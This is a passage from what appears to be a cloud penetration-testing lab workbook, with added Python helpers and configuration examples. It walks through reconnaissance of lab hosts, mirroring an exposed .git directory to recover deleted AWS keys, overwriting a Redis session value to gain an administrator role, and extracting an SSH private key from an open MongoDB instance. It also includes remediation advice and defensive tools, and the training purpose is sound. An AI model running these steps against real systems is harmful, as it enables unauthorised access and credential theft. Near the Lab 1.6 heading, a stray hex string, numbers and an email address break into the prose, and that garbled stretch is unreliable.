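Discovered open port 80/tcp on 203.0.113.10
Discovered open port 22/tcp on 203.0.113.10
Discovered open port 6379/tcp on 203.0.113.20
Discovered open port 27017/tcp on 203.0.113.20
Discovered open port 22/tcp on 203.0.113.20
Discovered open port 80/tcp on 203.0.113.10
"""

DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<ip>\S+)$"
)


def parse_masscan(output):
    """Map each host to the sorted list of open TCP ports masscan reported.

    Anything that is not a "Discovered open port" line is ignored, and a port
    reported more than once for the same host is recorded once.
    """
    hosts = defaultdict(set)
    for line in output.splitlines():
        m = DISCOVERED_RE.match(line.strip())
        if m and m.group("proto") == "tcp":
            hosts[m.group("ip")].add(int(m.group("port")))
    return {ip: sorted(ports) for ip, ports in hosts.items()}


def nmap_commands(hosts, out_prefix):
    """Build one nmap argv (as a list, ready for subprocess) per distinct port set.

    nmap takes a single -p list for all targets of one run, so hosts sharing the
    same set of open ports are scanned together and each group gets its own -oA
    prefix (out_prefix followed by 1, 2, ...). Groups are emitted in sorted order
    so the numbering is stable between runs.
    """
    groups = defaultdict(list)
    for ip, ports in hosts.items():
        groups[tuple(ports)].append(ip)
    commands = []
    for n, (ports, ips) in enumerate(sorted(groups.items()), start=1):
        commands.append(
            ["sudo", "nmap", "-p", ",".join(str(p) for p in ports),
             "-A", "-oA", f"{out_prefix}{n}"] + sorted(ips)
        )
    return commands


if __name__ == "__main__":
    found = parse_masscan(SAMPLE_MASSCAN_OUTPUT)
    for ip, ports in sorted(found.items()):
        print(ip, ports)
    # Assumed output location, mirroring the lab's workdir layout.
    for argv in nmap_commands(found, "/home/sec588/files/workdir/scan"):
        print(" ".join(argv))
```

For anything larger than a classroom target list, masscan's file outputs (-oL or -oJ) are a more stable input than screen scraping, but the grouping logic stays the same.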

Lab 1.4: Finding Secrets in Git

Brief Intro

Developers will use source code repository tools to save their work and collaborate with other developers. Sometimes these developers will accidentally commit secrets into their code repositories, and they will attempt to remove those items, or secrets, by just deleting the files that they committed. This is not sufficient to remove the files completely from the repository. As such, an attacker that finds the repository can pull the files back and use the key material.

Requirements for This Lab

In this lab we will be requiring connectivity to our lab environment. Connectivity to the 'dev' server, as discovered in the previous labs, will be required.

Try It Yourself

One of the servers that is in our list of hosts may have an exposed file that could provide us with some level of authentication.

To complete this task, you must:

1. Enumerate all of the common subdirectories across the hosts.
2. Download the exposed file or directory with files.
3. If it is a source code repository, pull out the appropriate key material.

Walkthrough

Getting started

As we are doing reconnaissance, let's try and get several tools together to attempt to pull down this exposed .git directory.

Open a MATE shell and let's re-run dnsrecon.py.


The first step would be to use gobuster. Gobuster can be run in 'dir' mode, which will allow us to brute force directories.

This presents us with our first problem: what are common SCM directories and sensitive files?

One possible option would have been to open scan1.nmap and look at the top of the text file. Run the following command:

less /home/sec588/files/workdir/scan1.nmap

Look for the line that reads:

| http-git:
<ip>:80/.git/

This indicates we have a .git directory available on the host, in the .git folder of the web root. There are other ways we can see this data. Let's look at a simple wordlist that we generated:

$ cat /home/sec588/files/wordlists/scm.txt

This file just contains a small list of entries. Let's now look at our potential hosts:

$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print tolower($2) }' | sort -u | grep -v name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt

This is a very long string, but let's break down what is happening here.

1. We cat out the dnsrecon.csv file
2. We use awk to separate each field by comma (,) and then we print all the characters in lowercase, picking JUST the second field, which will be our URLs
3. Next we sort uniquely all entries
4. Finally we send this list through grep -v to remove two kinds of entries: name and amazonaws entries.
5. All of this is sent to /home/sec588/files/workdir/urls.txt.

We now have a list of hosts to go and use Gobuster with.
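Both awk one-liners in this workbook (the one for ips.txt in Lab 1.3 and the one for urls.txt above) pull a single column out of the dnsrecon CSV. The following Python example, added here and not part of the course materials or of dnsrecon, does the same extraction in one pass and makes the edge cases explicit: CNAME rows have an empty Address column (the reason for the grep -v '^$' step), the header row must be dropped, hostnames are lower-cased and de-duplicated, and the amazonaws names are filtered out as the lab does. It also validates that the Address column really holds an IP literal and sorts addresses numerically rather than as strings. The column layout (Type,Name,Address,Target,Port,String) is assumed from the fields the lab's awk commands use; the sample rows and the 203.0.113.x addresses are constructed.

```python
import csv
import io
import ipaddress

# Constructed sample in the assumed dnsrecon CSV layout. The hostnames reuse the
# lab's <class-subdomain> placeholder and the addresses are RFC 5737 documentation
# addresses; none of these are real records. The mixed-case WWW row and the CNAME
# row with an empty Address column are there to exercise the edge cases.
SAMPLE_DNSRECON_CSV = """\
Type,Name,Address,Target,Port,String
A,www.<class-subdomain>.sec588.net,203.0.113.10,,,
A,WWW.<class-subdomain>.sec588.net,203.0.113.10,,,
A,dev.<class-subdomain>.sec588.net,203.0.113.20,,,
CNAME,blog.<class-subdomain>.sec588.net,,ec2-203-0-113-30.compute-1.amazonaws.com,,
A,ec2-203-0-113-30.compute-1.amazonaws.com,203.0.113.30,,,
"""


def parse_dnsrecon_csv(text, skip_substrings=("amazonaws",)):
    """Return (ips, hostnames) from dnsrecon CSV text.

    ips:       unique values of the Address column that parse as IP addresses,
               in numeric order (the awk '{ print $3 }' pipeline for ips.txt).
    hostnames: unique lower-cased Name values, minus the header and minus any
               name containing one of skip_substrings (the urls.txt pipeline,
               where 'grep -v amazonaws' drops the generic AWS hostnames).
    """
    ips = set()
    hosts = set()
    for row in csv.DictReader(io.StringIO(text)):
        addr = (row.get("Address") or "").strip()
        if addr:  # empty for CNAME rows, which only carry a Target
            try:
                ips.add(ipaddress.ip_address(addr))
            except ValueError:
                pass  # not an IP literal (e.g. a TXT string); ignore it
        name = (row.get("Name") or "").strip().lower()
        if name and not any(s in name for s in skip_substrings):
            hosts.add(name)
    # Sort by family first so IPv4 and IPv6 objects are never compared directly.
    ordered = sorted(ips, key=lambda ip: (ip.version, ip))
    return [str(ip) for ip in ordered], sorted(hosts)


def write_target_lists(text, ips_path, urls_path):
    """Write the two files the later labs read with -iL and the for-loop."""
    ips, hosts = parse_dnsrecon_csv(text)
    with open(ips_path, "w") as f:
        f.write("\n".join(ips) + "\n")
    with open(urls_path, "w") as f:
        f.write("\n".join(hosts) + "\n")
    return len(ips), len(hosts)


if __name__ == "__main__":
    ips, hosts = parse_dnsrecon_csv(SAMPLE_DNSRECON_CSV)
    print("ips:", ips)
    print("hosts:", hosts)
```

Point write_target_lists at /home/sec588/files/workdir/dnsrecon.csv with the workdir paths from the lab to reproduce both files at once.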


Gobuster and a list of urls

We have two challenges here.

1. Feed Gobuster a list of directories, which we can do with the -w switch
2. Feed Gobuster a list of hosts to enumerate.

We have provided you with a command line argument to do this:

for URL in `cat /home/sec588/files/workdir/urls.txt`; do /opt/gobuster/gobuster dir -u $URL -w /home/sec588/files/wordlists/scm.txt -o /home/sec588/files/workdir/scm-$URL.txt; done

This particular script that we see has a few items to take note of, so let's look through this:

1. We have a for loop in which we are placing into the URL variable whatever is contained in our txt file of URLs.
2. The next section after the do is our gobuster command, in which:
   we use dir (for directory bruteforcing)
   we use -u, passing in whatever item in $URL we are working with now
   we are outputting with -o and adding to the end of the filename the $URL we are working on
3. We end any loop with done.

Once this completes we can see if any files contain any content:

$ ls -la /home/sec588/files/workdir

You will find that one server, dev.<class-subdomain>.sec588.net, has content:

$ cat /home/sec588/files/workdir/scm-dev.<class-subdomain>.sec588.net.txt

This should reveal that it has a .git directory. Let's go retrieve it.

Downloading from .git

Our .git directory is publicly exposed; we can enumerate all the entries with something like wget!

$ cd /home/sec588/files/workdir

$ mkdir lab14

$ cd lab14

$ wget --mirror -I .git http://dev.<class-subdomain>.sec588.net/.git/

Now that we have the git directory, let's look through it:

$ cd dev.<class-subdomain>.sec588.net

$ git log

The git log will show you a single commit. This commit may be of interest, considering that the comments have the words: "Opps, committed the key".

"Opps" is spelled wrong as well. Unsure what the author may have been thinking when he did that.

Let's review that commit. To do this you need to copy the hash value that is shown next to the word "commit":

$ git show <hash value>

If we have correctly put in the command, at the bottom you will see two entries, more than likely colored in red with a - in front of them.

-AWS_KEY=

-AWS_SECRET_KEY=

Store these values somewhere; we will use them in Day 2, as we will see.

Replay of this lab

Conclusion

In this lab we did a few things. We used Gobuster to comb through hosts in directory bruteforcing format. We then understood how to loop through a set of hosts, passing in directory values. We downloaded exposed .git repositories. From those directories we were able to retrieve sensitive data. This sensitive data we have found appears to be AWS keys that we may be able to use.

If there has been a key exposure issue, it is recommended that several steps be taken:

1. Revoke the exposed keys
2. Revoke all other keys
3. Use multi-factor authentication with keys when available, like in AWS
4. Consistently rotate your keys

Why This Lab Is Important

This particular lab highlights some important issues with the git utility. The system itself is designed to keep a record of all changes, and as such deleting an incorrectly committed file alone is not good enough to wipe out its contents. Instead you need to completely remove the files using appropriate tools. A tool like BFG Repo-Cleaner (https://rtyley.github.io/bfg-repo-cleaner/) can do this if you follow the process it describes. There are also auditing tools like gitleaks that will help you find issues like these and resolve them.

Bonus (If Time Permits or Homework)

Experiment with a tool called gitleaks. It can review git repositories for leaks of other types of key material. We will be looking for our key material in a different lab, but if you want a sneak peek, we recommend running this tool.

Here is an example of how the tool can be run:

$ docker run --rm -v /home/sec588/files/workdir/lab14/dev.<class-subdomain>.sec588.net/:/code/ --name=gitleaks zricethezav/gitleaks -v --repo-path=/code

This will show you many entries, but the first few will be fairly familiar as they are the AWS Keys in our lab.
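To make concrete what an auditing tool such as gitleaks is checking for, here is a minimal history scanner in Python, added here as an example and not code from the course, from gitleaks, or from any other project. It reads the unified-diff output of git show or git log -p, tracks the commit and file each line belongs to, and reports AWS-style credentials on both added and removed lines, because, as this lab demonstrates, the commit that deletes a secret still leaves it in history. The sample git show output is constructed: the commit hash and index lines are placeholders, and the key pair is the non-working example pair AWS publishes in its own documentation, so nothing in it is a live credential. Matches are redacted before they are reported, so the scanner's own output does not become another copy of the secret.

```python
import re
import sys

# Constructed `git show` output modelled on the lab's commit. The hash and
# index values are placeholders; the AWS key pair is AWS's documented example
# pair and does not work anywhere.
SAMPLE_GIT_SHOW = """\
commit 0000000000000000000000000000000000000000
Author: Example Dev <dev@example.invalid>
Date:   Tue Jul 28 12:00:00 2020 +0000

    Opps, committed the key

diff --git a/.env b/.env
deleted file mode 100644
index 0000000..0000000
--- a/.env
+++ /dev/null
@@ -1,2 +0,0 @@
-AWS_KEY=AKIAIOSFODNN7EXAMPLE
-AWS_SECRET_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
diff --git a/README.md b/README.md
index 0000000..0000000 100644
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 # dev site
+Removed the .env file.
"""

PATTERNS = {
    # AWS access key IDs are 20 characters and start with the documented AKIA prefix.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # A 40-character base64-style value assigned to a variable whose name says "secret".
    "aws_secret_access_key": re.compile(
        r"(?i)aws[_-]?secret[_a-z]*\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
    ),
}


def redact(value):
    """Keep just enough of a match to recognise it in a report."""
    return value[:4] + "..." + value[-4:] if len(value) > 8 else "..."


def scan_git_show(text):
    """Scan unified-diff text for credential patterns on added and removed lines.

    Returns a list of findings with the commit, file, whether the line was
    added or removed, the pattern name, and a redacted form of the match.
    """
    findings = []
    commit = path = None
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("--- a/"):
            path = line[6:]  # file before the change (the only name a deleted file has)
        elif line.startswith("+++ b/"):
            path = line[6:]  # file after the change (the only name a new file has)
        elif line.startswith(("+++ ", "--- ")):
            continue  # /dev/null side of a creation or deletion
        elif line[:1] in ("+", "-"):
            change = "added" if line[0] == "+" else "removed"
            for kind, pattern in PATTERNS.items():
                for m in pattern.finditer(line[1:]):
                    secret = m.group(m.lastindex or 0)
                    findings.append({"commit": commit, "file": path, "change": change,
                                     "kind": kind, "match": redact(secret)})
    return findings


if __name__ == "__main__":
    # Pipe `git log -p --all` into this script to scan a whole repository;
    # with no piped input it scans the constructed sample instead.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GIT_SHOW
    for f in scan_git_show(text):
        print(f"{f['commit'][:12]} {f['file']} {f['change']} {f['kind']} {f['match']}")
```

Run it against a working copy with git log -p --all | python3 scan.py (assumed file name); a finding on a removed line is the signal that a history rewrite, not just a deletion, is needed.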

Lab 1.5: Exposed Databases

Brief Intro

Exposing databases and session stores to the internet accidentally can happen, specifically when dealing with rapid deployments in highly dynamic environments. Even if the systems in the environment are not directly exposed to the internet, they could also be accessed from within an environment. This lab will introduce the impact of such an issue. We are going to look at the Redis database instance that we are running and we are going to look at the MongoDB instance that we are also running. In these two environments we will find mechanisms to control websites and potentially to expose potential problems.

Requirements for This Lab

In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet connectivity.

It is also recommended that Lab 1.2 through Lab 1.4 are completed so that you have an understanding of the environment thus far.

The wiki will be located here:

http://wiki.<class-subdomain>.sec588.net

Try It Yourself

Given that we have discovered exposed MongoDB and Redis databases, let's attempt to leverage these.

1. Visit the dev site. Example: http://dev.<class-subdomain>.sec588.net
2. Make a note of your session number and your user role.
3. Log into the Redis database environment by using the redis-cli and attempt to modify your role from 'user' to 'admin'. Is there a change in the portal?
4. Look at the MongoDB environment. The environment is not only enumerable but it can be changed.
5. Attempt to change your favorite items.
6. Are there any special items located in the MongoDB instance? We will discover these later.

Walkthrough

Open a MATE shell and let's re-run dnsrecon.py.


Validating our broken wiki

Let's try and update our local virtual machine wiki:

$ cd /opt/wiki

$ sudo ./wiki-updater.sh

Based on our script we can see that we are getting a permission denied error because we don't have the keys. We will find some keys, potentially, in the next few slides.

Looking at the dev site

Let's take a look at the dev site: open up Firefox and navigate to http://dev.<class-subdomain>.sec588.net

Once the page opens, look at the Session ID area and take a note of it. Also take a note of the fact that you have a user role.

It also appears that you have a setting for the type of beer you have.

Please note that what you see in the screenshot will be different than what is in class; we may have one entry or five entries, and the DNS name will be different.


This particular environment has a resolution back to our host. We had previously discovered exposed database ports for our domain. Let's try and take a look at some of these.

Logging into Redis

The Redis server can be logged into via telnet, or alternatively we can use the developer and system administration tools for Redis. To do this we would use our redis-cli. We have provided you in the webpage a shortcut to the dev server. It should be an amazonaws.com based domain.

Recall that we discovered this particular set of hosts through both host discovery and port discovery in the previous labs.

$ redis-cli -h <dns name of amazonaws.com host>

From the redis-cli, type in the command:

<hostname:6379> KEYS *

Here you will see the output of KEYS. We should find our KEY, which should be located in our webpage. You can copy and paste it out of Firefox. In the example above it was:

Your key name will be different

<hostname:6379> KEYS p8hsnhsaagpmk0iudoi6g7qam

We can now set a new value. We can play with values like: administrator.

<hostname:6379> SET p8hsnhsaagpmk0iudoi6g7qam administrator

We can see if we are affecting the application by refreshing the page.

Play with these values; maybe while the first value may not have given you different access, another value will:

root
Administrator
superuser
0
admin

Each time you set a new key, refresh the page. Once you are satisfied you can type exit or close the shell.

Finding more secrets

While Redis is designed to hold application state or be a session storage location, MongoDB is more of a document object store that many web applications use as a primary database. Let's attempt to connect to the MongoDB environment, since it is not straightforward.

$ mongo --host <same host as redis> --port 27017

Once you are inside the mongo shell, let's look at the databases that are shown:

> show databases

Note: admin, config, and local are all standard databases that come with mongo.

Let's look through the mongo database to see what collections (think tables) are in the demo database:

> use demo

> db.getCollectionInfos()

The db.getCollectionInfos() call will show you the collections that are inside of the demo database.


> db.beers.find().pretty()

This will show all the items in the beers collection. There seems to be a correlation. What could be in the other collection?

> db.admin.find().pretty()

Save the keys from -----BEGIN to KEY----- into a file called /home/sec588/.ssh/sec588-wiki-keys-oneline.

You can use gedit to do this by typing the following command:

$ sudo gedit /home/sec588/.ssh/sec588-wiki-keys-oneline

Paste the entire long string in.

Adding our keys into our VM

From the MATE Terminal we now have a set of SSH keys we can add to our lab VM, but there is an exception. The SSH client doesn't accept a key that doesn't respect the 64-characters-per-line format. Luckily we have a simple script that does this. The script is as follows:

#!/bin/bash
# Remove any previous reflowed key, then rebuild it from the one-line copy:
# newline after the BEGIN marker, newline before the END marker, and a
# newline after every 64 non-whitespace characters of the body.
rm -Rf /home/sec588/.ssh/sec588-wiki-vm-keys
sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/" \
    -e "s/-----END RSA PRIVATE KEY-----/\n&/" \
    -e "s/\S\{64\}/&\n/g" \
    /home/sec588/.ssh/sec588-wiki-keys-oneline > /home/sec588/.ssh/sec588-wiki-vm-keys
chmod 400 /home/sec588/.ssh/sec588-wiki-vm-keys

The script can be called in the following fashion:

$ /home/sec588/files/rsajoin/rsajoin.sh

Sometimes you will see an issue with the RSAJoin script where an extra space (or new line) is added before -----END RSA PRIVATE KEY-----; we recommend editing the file and removing it.

$ sudo gedit /home/sec588/.ssh/sec588-wiki-vm-keys

Once the file is correct you will also need to change the permissions; this will fix the keys, but they also need to be committed to the right permissions.

$ chmod 0400 /home/sec588/.ssh/sec588-wiki-vm-keys

If this works you should be able to update the wiki by typing the following commands:

$ cd /opt/wiki

$ ./wiki-updater.sh
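The stray newline before -----END that the rsajoin.sh note above warns about is not random: the sed script inserts a newline after every 64 body characters and another one before the END marker, so whenever the base64 body is an exact multiple of 64 characters the two meet and produce a blank line, which ssh rejects. The following Python example, added here and not part of the course's rsajoin script, does the same reflow while stripping every whitespace character out of the body first, so that case (and a pasted space before the END marker) cannot occur, and it base64-decodes the body once as a sanity check so a truncated paste fails immediately rather than at ssh time. It accepts any PEM label (RSA PRIVATE KEY, OPENSSH PRIVATE KEY, ...), not only the RSA one the lab script hard-codes. The sample key body is constructed from 96 arbitrary bytes (128 base64 characters, deliberately a multiple of 64) and is not a real key; the file writer's path is whatever the caller passes.

```python
import base64
import os
import re

PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----(?P<body>.*?)-----END (?P=label)-----",
    re.DOTALL,
)

# Constructed sample: 96 arbitrary bytes encode to exactly 128 base64 characters
# (a multiple of 64), flattened onto one line with a stray space before the END
# marker. It is not a private key; any bytes would do to demonstrate the reflow.
SAMPLE_BYTES = bytes(range(96))
SAMPLE_ONELINE = ("-----BEGIN RSA PRIVATE KEY-----"
                  + base64.b64encode(SAMPLE_BYTES).decode()
                  + " -----END RSA PRIVATE KEY-----")


def reflow_pem(oneline):
    """Rebuild a PEM block whose body was flattened onto one line.

    All whitespace inside the body is discarded before wrapping, so no blank
    line or trailing space can end up before the END marker. The body must
    decode as base64; otherwise a binascii.Error is raised.
    """
    m = PEM_RE.search(oneline)
    if not m:
        raise ValueError("no matching PEM BEGIN/END pair found")
    body = re.sub(r"\s+", "", m.group("body"))
    base64.b64decode(body, validate=True)  # sanity check: rejects stray characters
    lines = [f"-----BEGIN {m.group('label')}-----"]
    lines += [body[i:i + 64] for i in range(0, len(body), 64)]
    lines.append(f"-----END {m.group('label')}-----")
    return "\n".join(lines) + "\n"


def pem_body(pem):
    """Decode the body of a PEM block (handy for checking a reflowed key)."""
    m = PEM_RE.search(pem)
    if not m:
        raise ValueError("no matching PEM BEGIN/END pair found")
    return base64.b64decode(re.sub(r"\s+", "", m.group("body")), validate=True)


def write_private_key(path, pem):
    """Write the key owner-only (0600): ssh refuses group- or world-readable keys.

    The mode is applied with chmod as well, because O_CREAT's mode argument is
    ignored when the file already exists.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(pem)
    os.chmod(path, 0o600)


if __name__ == "__main__":
    print(reflow_pem(SAMPLE_ONELINE))
```

To use it on the lab file, read /home/sec588/.ssh/sec588-wiki-keys-oneline, pass the contents to reflow_pem, and hand the result to write_private_key with the sec588-wiki-vm-keys path; the chmod step in the walkthrough is then already done.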

Replay of this lab

Conclusion

In this lab we have discovered an SSH key buried within an admin key in the MongoDB environment. While this is not necessarily always the case, the primary objective of the lab was to demonstrate the dangers of exposing a database to the open internet; alternatively, if an attacker has shell access to a server, they can discover a database that exists already and manipulate an application at runtime.

We will be exploring these concepts more in a future lab.

Why This Lab Is Important

Misconfigurations such as exposing databases into the public cloud can happen quite easily in a rapidly moving cloud system. It is important to understand what the impacts are to such a system.
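For the defensive side of this lab, the Redis settings that made the session store writable from the lab VM sit beside their corrected form below. This is an added example of a redis.conf fragment, not configuration from the course or from the lab's servers; the password value is a placeholder. The MongoDB equivalent is the net.bindIp and security.authorization (enabled) settings in mongod.conf.

```conf
# --- Weak: what the lab found. Anyone who can reach TCP/6379 can run KEYS and
# --- SET against the session keys, and protected-mode is off so Redis does not
# --- refuse unauthenticated clients from non-loopback addresses.
bind 0.0.0.0
protected-mode no
# requirepass is unset, so no AUTH is needed

# --- Corrected: listen only where the application actually connects from,
# --- keep protected-mode on, and require a password that the application
# --- sends with AUTH before any other command.
bind 127.0.0.1
protected-mode yes
requirepass <long-random-password-placeholder>
# Optional: take destructive commands off the table entirely for this instance.
rename-command FLUSHALL ""
rename-command FLUSHDB ""
```

With bind set to a private address (or the loopback interface plus the application host's interface), the masscan pass from Lab 1.3 no longer shows 6379 at all, which is the result to verify after the change.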
Lab 1.6: EyeWitness in the
3e1e3b497543e6c11ac8e4188959c93e
Cloud

20
Brief Intro

, 20
28
pauljones166@outlook_com
Our eyes can often pick out information visually much quicker than we can from text. It takes us longer to read through words, and our minds tend to self-correct or focus on the wrong things. EyeWitness takes screenshots of HTTP pages and presents them in a single report-style page, which can save valuable time. We can also glean useful information from the screenshots: a site may be heavy with JavaScript and not named in a way that tells us what it does, but a screenshot of it often will.

Requirements for This Lab

In this lab it will be required to have completed the first 5 labs.

By now you should have found the Wiki and even downloaded it locally to your computer.

The wiki will be located here:

http://wiki.<class-subdomain>.sec588.net

Try It Yourself

In this particular lab we are going to take the sites that we have found and catalog them into a single report view using EyeWitness.

To do this you will want to create an A/B comparison: one list of IP addresses and one list of hostnames in your workdir, so that the same hosts can be screenshotted both ways.

$ gedit /home/sec588/files/workdir/ips.txt
$ gedit /home/sec588/files/workdir/urls.txt

You can run EyeWitness.py from the /opt/eyewitness directory. It requires the --web command line argument. You can also pass dnsrecon.py the -c flag to write its results to a CSV file; we recommend using dnsrecon.py to build the list of URLs, but however you do it, it is easier to automate this step than to type the lists by hand.

Walkthrough

Getting a list of scanning targets

Open a MATE shell and let's re-run dnsrecon.py.

We are going to follow the process we have been following to obtain the IP addresses and host names to scan.

Starting with dnsrecon.py, let's build a list of hosts:

$ cd /opt/dnsrecon
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D /home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt -c /home/sec588/files/workdir/dnsrecon.csv

This will generate a CSV file that you can use to build a list of URLs. There are two ways to do this:

1. Manually copy the hostnames into /home/sec588/files/workdir/urls.txt
2. Use awk to pull out the correct columns from the CSV.

This is the awk command; you can choose whichever method you are comfortable with:

$ awk -F, '{ print tolower($2) }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v '^name$' | grep -v amazonaws > /home/sec588/files/workdir/urls.txt

The reason the command has multiple pipe operators is to remove duplicate entries (sort -u) and to remove junk: the CSV header line (tolower() has already turned the Name header into name, so the filter matches that exact line rather than the mixed-case Name) and the Amazon AWS CNAME targets. The > at the end writes the resulting list into a file for use with EyeWitness.

Now we can do the same for Masscan. We have all of the hostnames, but we also want all the IP addresses that are associated with this domain. Let's obtain those IP addresses:

$ awk -F, '{ print $3 }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v Address | grep -v '^$' > /home/sec588/files/workdir/ips.txt

We now have two lists, one for URLs and one for IP addresses. We could merge them into a single list, but let's see what happens if we run the tools this way.
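
The same list-building step as an added worked example in Python (not code from the workbook, dnsrecon or EyeWitness): it parses a constructed dnsrecon CSV in the column layout the awk commands above assume (Type,Name,Address,... with column 2 the name and column 3 the address), lowercases and deduplicates the names, drops the header row and the amazonaws CNAME targets, and keeps only values that actually parse as IP addresses for the IP list, which the awk version does not check. The hostnames and TEST-NET addresses in the sample are made up.

```python
"""Added example, not part of the SEC588 workbook or of dnsrecon/EyeWitness:
build the two EyeWitness input lists (hostnames and IP addresses) from a
dnsrecon CSV, covering the cases the awk one-liners skip."""
import csv
import io
import ipaddress

# Constructed sample in the column layout the awk commands assume
# (Type,Name,Address,...; column 2 = Name, column 3 = Address). The
# ".lab.sec588.net" hosts and the TEST-NET addresses are made up.
SAMPLE_CSV = """Type,Name,Address,Target,Port,String
A,WIKI.lab.sec588.net,203.0.113.5,,,
A,blog.lab.sec588.net,203.0.113.6,,,
CNAME,www.lab.sec588.net,,s3-website-us-east-1.amazonaws.com,,
A,s3-website-us-east-1.amazonaws.com,198.51.100.20,,,
A,wiki.lab.sec588.net,203.0.113.5,,,
NS,lab.sec588.net,198.51.100.53,,,
"""


def split_dnsrecon_csv(text, drop_substrings=("amazonaws",)):
    """Return (hostnames, ips).

    hostnames: lowercased, deduplicated, sorted, minus the header row and any
    name containing one of drop_substrings (provider CNAME targets are noise
    in the URL list). ips: deduplicated and sorted numerically, keeping only
    values that really parse as IP addresses; a CNAME target or an empty
    field would otherwise end up in ips.txt."""
    hosts, ips = set(), set()
    for row in csv.DictReader(io.StringIO(text)):
        name = (row.get("Name") or "").strip().lower()
        if name and not any(s in name for s in drop_substrings):
            hosts.add(name)
        address = (row.get("Address") or "").strip()
        try:
            ips.add(ipaddress.ip_address(address))
        except ValueError:
            pass  # blank, or a hostname such as a CNAME target
    ordered = sorted(ips, key=lambda ip: (ip.version, int(ip)))
    return sorted(hosts), [str(ip) for ip in ordered]


def write_lists(text, urls_path, ips_path):
    """The file-writing equivalent of the two '>' redirections."""
    hosts, ips = split_dnsrecon_csv(text)
    with open(urls_path, "w") as f:
        f.write("\n".join(hosts) + "\n")
    with open(ips_path, "w") as f:
        f.write("\n".join(ips) + "\n")
    return len(hosts), len(ips)


if __name__ == "__main__":
    hosts, ips = split_dnsrecon_csv(SAMPLE_CSV)
    print("urls.txt:", *hosts, sep="\n  ")
    print("ips.txt:", *ips, sep="\n  ")
```

Note that the IP list deliberately keeps the 198.51.100.20 address behind the amazonaws CNAME: that is exactly the entry that produces the provider default page in the IP report, which is the point of the A/B comparison.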

Getting EyeWitness to process IPs

Let's first get into our EyeWitness directory, now that we have the prerequisite files, and run the first collection, the IP list:

$ cd /opt/eyewitness
$ ./EyeWitness.py --web -f /home/sec588/files/workdir/ips.txt

When this is complete it will ask you if you wish to view the report now; enter "Y" and hit Enter. This will load Firefox with the report.

We can see that some pages are indeed available using this method, but this is all subject to implementation, as most systems use the HTTP Host header to route a request to the appropriate site. This is what occurs with Amazon S3: requesting the S3 addresses by IP does not show our websites; instead we see the default Amazon page. Let's try to correct this:

$ ./EyeWitness.py --web -f /home/sec588/files/workdir/urls.txt

The difference between the two reports will be evident: we are no longer seeing any pages from the hosting provider. There are many ways to tell that a site is hosted in AWS IP space, and one of the simplest is to request the page by IP address. This is a simple visual indicator that is lost when scanning only by URL. There are other markers, such as the AMZN header, which we will discuss later.
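
To see why the two reports differ, here is an added example (not code from the workbook or EyeWitness) of the Host-header routing that causes it: a small name-based virtual host server on localhost stands in for the S3 website endpoint, and the client opens the same address twice, changing only the Host header. The vhost names, page bodies and the 404 default response are constructed; a real provider's default response looks different.

```python
"""Added example, not part of the workbook or of EyeWitness: why the IP scan
shows the provider's default page while the URL scan shows the real sites.
A constructed name-based virtual host server stands in for S3; the client
connects to the same address twice and changes only the Host header."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed vhosts; the names are made up.
SITES = {
    "wiki.lab.example": b"<h1>wiki</h1>",
    "blog.lab.example": b"<h1>blog</h1>",
}
DEFAULT_PAGE = b"<h1>provider default page: unknown bucket</h1>"


class VHostHandler(BaseHTTPRequestHandler):
    """Route on the Host header, as S3 website endpoints and most shared
    front ends do. Anything not matching a configured name gets the default
    page (constructed; the real provider's response differs)."""

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        if host in SITES:
            status, body = 200, SITES[host]
        else:
            status, body = 404, DEFAULT_PAGE
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind to an ephemeral localhost port; returns the server object."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(port, host_header):
    """GET / over a connection to 127.0.0.1:port with the given Host header.
    This is what EyeWitness does implicitly: an ips.txt entry of 203.0.113.5
    sends 'Host: 203.0.113.5', a urls.txt entry of wiki.lab.example sends
    that name."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body


def ab_compare(port, ip="127.0.0.1", name="wiki.lab.example"):
    """The A/B comparison from the lab: one target, fetched both ways."""
    return {"by_ip": fetch(port, ip), "by_name": fetch(port, name)}


if __name__ == "__main__":
    srv = start_server()
    try:
        for how, (status, body) in ab_compare(srv.server_address[1]).items():
            print(how, status, body.decode())
    finally:
        srv.shutdown()
        srv.server_close()
```

The by_ip request is the one that lands on the provider page: nothing about the IP tells the front end which site you meant, and a scanner that only reports the status code would file it as a dead host rather than as "something hosted here under another name".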

Now notice at the top of each page there is a section called 'Uncategorized'. EyeWitness uses a file called categories.txt; if you open this file you will see how the tool matches sites:

$ cat categories.txt

Each line is a string of text to look for in a page, followed by a pipe operator '|' and then the category to assign when that text matches. As these sites do not match any of the strings, they are not categorized.

As always, if you feel that you can contribute to a tool and provide a set of categories back to the author, they may accept a pull request like this.

Replay of this lab

Conclusion

